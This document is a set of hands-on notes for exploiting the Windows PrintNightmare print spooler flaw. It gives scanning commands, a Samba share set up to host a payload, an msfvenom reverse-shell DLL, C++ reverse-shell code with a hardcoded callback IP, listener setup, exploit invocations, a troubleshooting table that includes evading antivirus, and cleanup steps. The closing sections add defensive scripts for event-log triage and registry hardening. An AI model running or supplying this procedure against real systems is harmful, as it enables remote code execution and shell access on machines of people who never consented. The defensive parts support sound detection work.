Printnightmare

Requirements

A user account (its privileges don't matter).

Scan

RPC Dump

If you can reach these RPC interfaces (MS-RPRN or MS-PAR) the host may be exploitable with PrintNightmare.

rpcdump.py @ip | egrep 'MS-RPRN|MS-PAR'


It Was All A Dream

https://github.com/byt3bl33d3r/ItWasAllADream

git clone https://github.com/byt3bl33d3r/ItWasAllADream
cd ItWasAllADream && docker build -t itwasalladream .
docker run -it itwasalladream -u user -p password -d domain 192.168.1.0/24
docker cp <container-id>:/report_XXXXXXX ./

Setup tool for remote RCE (cube0x0)

Ensure you have an impacket version that has this PR merged.

mkdir printnightmare
cd printnightmare
mkdir payloads
git clone https://github.com/justin-p/CVE-2021-1675

Then if you are lazy just use the Taskfile included in the repo.

task payload_folder
task printnightmare_samba_share

To restore the smb.conf and stop the service run

task restore_samba

Otherwise use the steps below

Host Dll

Make a backup of your smb.conf

sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak

Overwrite the file with the following content

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[smb]
    comment = Samba
    path = /home/user/Documents/printnightmare/payloads/
    guest ok = yes
    read only = no
    browsable = yes
    force user = nobody

Ensure the files are owned by nobody

sudo chown nobody:user -R /home/user/Documents/printnightmare/payloads/
sudo chmod -R 777 /home/user/Documents/printnightmare/payloads/

Restart the smbd service

sudo service smbd restart

Don't forget to restore the SMB config (copy the backup back) and stop the service :)

sudo cp /etc/samba/smb.conf.bak /etc/samba/smb.conf
sudo service smbd stop

Outflank's implementation

https://github.com/outflanknl/PrintNightmare

Did not test this yet. But seems 'better' than the cube0x0 implementation.

Create DLL

Use MSFVenom if you think AV is not a problem. Otherwise build something custom.

MSFVenom

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /home/user/Documents/printnightmare/payloads/rev.dll

Custom simple C++ reverse shell example

  1. Install the C++ tools in Visual Studio.

  2. Create a new project with the Dynamic-Link Library template.

  3. Download the plain_revshell.cpp file and paste its content into the existing template.

  4. Update the RHOST & RPORT passed to StartCallback:

BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
	switch (dwReason) {
	case DLL_PROCESS_ATTACH:
		StartCallback("172.16.0.137", 80); // <- update this (RHOST, RPORT)
		break;
	}
	return TRUE;
}

  5. Build the release (Ctrl+Shift+B).

  6. Place the DLL in the payloads folder.

Usage

python3 [MSPAR|MSRPRN|MSRPRN_nobrute].py 'domain/user:pass@ip' PrinterName '\\IP_of_SMB_share\share\printer.dll'

There are 3 different versions. All versions have been updated to support a custom driver/printer name.

Version | Info | When to use
--------|------|------------
MSPAR | Abuses MS-PAR | When ItWasAllADream says it's vulnerable
MSRPRN | Abuses MS-RPRN | When ItWasAllADream says it's vulnerable
MSRPRN_nobrute | Abuses MS-RPRN but does not brute force driver folders, see this pull request | When ItWasAllADream says it's vulnerable but it does not seem to work and you have tried everything listed in Errors & tips

Errors & tips

Error | Solution
------|---------
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied | Check the permissions on the file in the SMB share
RPRN SessionError: unknown error code: 0x180 | Enable SMB2Support
RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified. | Typo in the supplied DLL path?
RPRN SessionError: code: 0xd8 - ERROR_EXE_MACHINE_TYPE_MISMATCH | DLL is broken or built for the wrong architecture (x86 vs x64)
RPRN SessionError: code 0xe1 - ERROR_VIRUS_INFECTED | AV caught you, try harder
RPRN SessionError: Unknown error code: 0x8001011b | Seems like the host is patched
RPRN SessionError: code: 0x43 - ERROR_BAD_NET_NAME | Wrong share name used in printnightmare or typo in the Samba config
SMB SessionError: STATUS_PIPE_BROKEN | Print spooler service crashed during payload execution. Restart the spooler if you got a shell (PowerShell: Restart-Service spooler. CMD: net stop spooler && net start spooler)
After killing the session the payload does not work a second time | Always make restarting the spooler service the first thing you do after a shell connects. If you did this, use a different printer name. Otherwise you're out of luck.
Sometimes when removing the print drivers the DLL will execute again. This means your payload will run again. | Nothing, just something to be aware of if you use a payload that adds a user or whatever.

Check if system reaches out

By pointing the exploit at a nc listener on port 445 instead of a real share we can verify that the target can reach our SMB server at all.

Start nc on 445.

sudo nc -nlvp 445

Run MSRPRN_nobrute and try to connect to nc.

python3 MSRPRN_nobrute.py 'user:pass@ip' PrinterName '\\IP_of_SMB_share\share\printer.dll'


Exploit

Setup a listener

Netcat:

nc -nlvp 80

MSF multi handler (the payload must match the one the DLL was built with, here the x64 payload from the msfvenom example above):

msfconsole -x "use exploit/multi/handler;\
set payload windows/x64/shell_reverse_tcp;\
set LHOST 172.16.0.137;\
set LPORT 80;\
set ExitOnSession false;\
run -j"

Run printnightmare

python3 [MSPAR|MSRPRN|MSRPRN_nobrute].py 'domain/user:pass@ip' PrinterName '\\IP_of_SMB_share\share\printer.dll'

Once you have a shell, restart the spooler on the target before anything else (see Errors & tips):

net stop spooler && net start spooler
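What the other side of this looks like, as an added example that is not part of these notes or of the cube0x0 tooling: the spooler records driver installs in the Microsoft-Windows-PrintService/Operational log (Event ID 316 when a driver is added or updated, 808 when the spooler fails to load a plug-in module). The script below triages such records. It flags 316 entries whose file list contains a UNC path or a core system DLL, and 808 entries whose failing module lives in the spool driver staging directories (\New\ and \Old\, the same paths the cleanup step deletes). The event messages are constructed approximations of the real text, and the heuristics are my assumptions rather than a vendor rule set.

```python
"""Triage Microsoft-Windows-PrintService/Operational records for PrintNightmare-style
driver installs. Added example, not from these notes or the cube0x0 tooling.
The event messages below are CONSTRUCTED approximations of Event ID 316/808 text
and the flagging heuristics are assumptions, not a vendor rule set."""
import re

# Constructed sample records as (event_id, message). Record 1 is an ordinary vendor
# driver; 2 and 4 mimic an exploit-style driver install (kernelbase.dll as a "driver
# file", plus a UNC path in record 2); 3 mimics the spooler failing to load that DLL.
SAMPLE_EVENTS = [
    (316, r"Printer driver HP Universal Printing PCL 6 for Windows x64 Version-3 was added "
          r"or updated. Files:- hpcu250u.dll, hpcu250u.gpd. No user action is required."),
    (316, r"Printer driver 1234 for Windows x64 Version-3 was added or updated. "
          r"Files:- UNIDRV.DLL, kernelbase.dll, \\10.0.0.5\smb\rev.dll. No user action is required."),
    (808, r"The print spooler failed to load a plug-in module "
          r"C:\Windows\system32\spool\DRIVERS\x64\3\New\rev.dll, error code 0x45A. "
          r"See the event user data for context information."),
    (316, r"Printer driver 1234 for Windows x64 Version-3 was added or updated. "
          r"Files:- UNIDRV.DLL, kernelbase.dll, rev.dll. No user action is required."),
]

# Message shapes. Kept permissive on purpose: wording varies by OS build and locale.
ADDED_RE = re.compile(
    r"Printer driver (?P<driver>.+?) for Windows .*? was added or updated\. "
    r"Files:- (?P<files>.+?)(?:\. No user action|$)", re.I)
PLUGIN_RE = re.compile(
    r"failed to load a plug-in module (?P<path>.+?), error code (?P<code>0x[0-9a-f]+)", re.I)
# Driver staging directories under the spool tree (the paths the cleanup step removes).
STAGING_RE = re.compile(r"\\spool\\drivers\\[^\\]+\\3\\(new|old)\\", re.I)
# DLLs that have no business being listed as printer driver files.
SYSTEM_DLLS = {"kernelbase.dll", "kernel32.dll", "ntdll.dll"}


def triage(events):
    """Return a list of (event_id, subject, reason) for records worth a closer look."""
    findings = []
    for event_id, message in events:
        if event_id == 316:
            m = ADDED_RE.search(message)
            if not m:
                continue
            files = [f.strip() for f in m.group("files").split(",")]
            reasons = []
            if any(f.startswith("\\\\") for f in files):
                reasons.append("driver file list contains a UNC path")
            if any(f.lower() in SYSTEM_DLLS for f in files):
                reasons.append("core system DLL listed as a printer driver file")
            if reasons:
                findings.append((event_id, m.group("driver"), "; ".join(reasons)))
        elif event_id == 808:
            m = PLUGIN_RE.search(message)
            if m and STAGING_RE.search(m.group("path")):
                findings.append((event_id, m.group("path"),
                                 f"plug-in load failed from spool staging dir (error {m.group('code')})"))
    return findings


if __name__ == "__main__":
    for event_id, subject, reason in triage(SAMPLE_EVENTS):
        print(f"[{event_id}] {subject}: {reason}")
```

The Operational channel is disabled by default, so nothing here fires unless it was enabled beforehand; in practice you would feed triage() records pulled with wevtutil or Get-WinEvent instead of the constructed list.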

Cleanup

PowerShell

Load the PrintManagement module (loaded by default on Windows 10):

Import-Module PrintManagement

List the current print drivers:

Get-PrinterDriver

Remove the print drivers that were installed (both PrinterName0 and PrinterName1):

Get-PrinterDriver | Where-Object {$_.Name -like "*PrinterName*"} | Remove-PrinterDriver

Oneliner

Watch out: Where-Object uses a wildcard so it catches both drivers that get installed (PrinterName0, PrinterName1). Also make sure to update dllname.dll in the Get-Item action.

Restart-Service Spooler;Import-Module PrintManagement;Get-PrinterDriver | Where-Object {$_.Name -like "*PrinterName*"} | Remove-PrinterDriver;Stop-Service spooler;Start-Sleep -s 2;Get-Item 'C:\windows\system32\spool\drivers\x64\3\New\','C:\windows\system32\spool\drivers\x64\3\Old\','C:\windows\system32\spool\drivers\x64\3\dllname.dll' -ErrorAction SilentlyContinue | Remove-Item;Start-Service spooler;Start-Sleep -s 2;Get-PrinterDriver

Mitigation

Method | Fix
-------|----
RCE via MS-RPRN | Update Windows
RCE via MS-PAR | Update Windows
LPE | Not tested yet
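Updating Windows is only half of the fix: the patch is undone by Point and Print policy settings that suppress the driver install prompts or allow non-admins to install drivers, which is why Microsoft's PrintNightmare guidance tells you to check the PointAndPrint policy key after patching. As an added example (not from these notes), the script below evaluates a reg export of that key. The registry path and the three value names are the real ones; the two exports are constructed samples, and the expected values are my reading of that guidance.

```python
"""Check an exported Point and Print policy key for settings that undo PrintNightmare
hardening. Added example, not from these notes. Assumptions: input is 'reg export'
(.reg) text; the key path and the three value names are the real Point and Print
policy values; the expected values are my reading of Microsoft's guidance."""
import re

POINT_AND_PRINT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT"
                       r"\Printers\PointAndPrint")

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{1,8})\s*$')

# CONSTRUCTED sample exports: the first re-enables non-admin driver installs and
# suppresses the Point and Print prompts, the second is the hardened configuration.
WEAK_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint]
"NoWarningNoElevationOnInstall"=dword:00000001
"UpdatePromptSettings"=dword:00000001
"RestrictDriverInstallationToAdministrators"=dword:00000000
"""

HARDENED_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint]
"NoWarningNoElevationOnInstall"=dword:00000000
"UpdatePromptSettings"=dword:00000000
"RestrictDriverInstallationToAdministrators"=dword:00000001
"""


def parse_reg_export(text):
    """Return {key_path: {value_name: int}} for the DWORD values in a .reg export."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group("key")
            keys.setdefault(current, {})
            continue
        m = DWORD_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = int(m.group("hex"), 16)
    return keys


def assess_point_and_print(text):
    """Return (level, value_name, message) findings; an empty list means hardened."""
    values = parse_reg_export(text).get(POINT_AND_PRINT_KEY, {})
    findings = []
    restrict = values.get("RestrictDriverInstallationToAdministrators")
    if restrict is None:
        # The key only exists once a policy has been set; a patched host then falls back
        # to its admin-only default, but nothing pins that down explicitly.
        findings.append(("warn", "RestrictDriverInstallationToAdministrators",
                         "not set; only the patched default keeps driver installs admin-only"))
    elif restrict != 1:
        findings.append(("fail", "RestrictDriverInstallationToAdministrators",
                         f"set to {restrict}: non-admin users may install printer drivers"))
    for name in ("NoWarningNoElevationOnInstall", "UpdatePromptSettings"):
        if values.get(name, 0) != 0:
            findings.append(("fail", name,
                             f"set to {values[name]}: Point and Print warning/elevation prompt suppressed"))
    return findings


if __name__ == "__main__":
    for label, export in (("weak", WEAK_EXPORT), ("hardened", HARDENED_EXPORT)):
        print(label, assess_point_and_print(export) or "OK")
```

Produce the input on the host with reg export "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" pnp.reg; reg export writes UTF-16, so open the file with encoding='utf-16' before passing its text to assess_point_and_print(). The key is absent until a policy has been set, which the script reports as a warning rather than a pass.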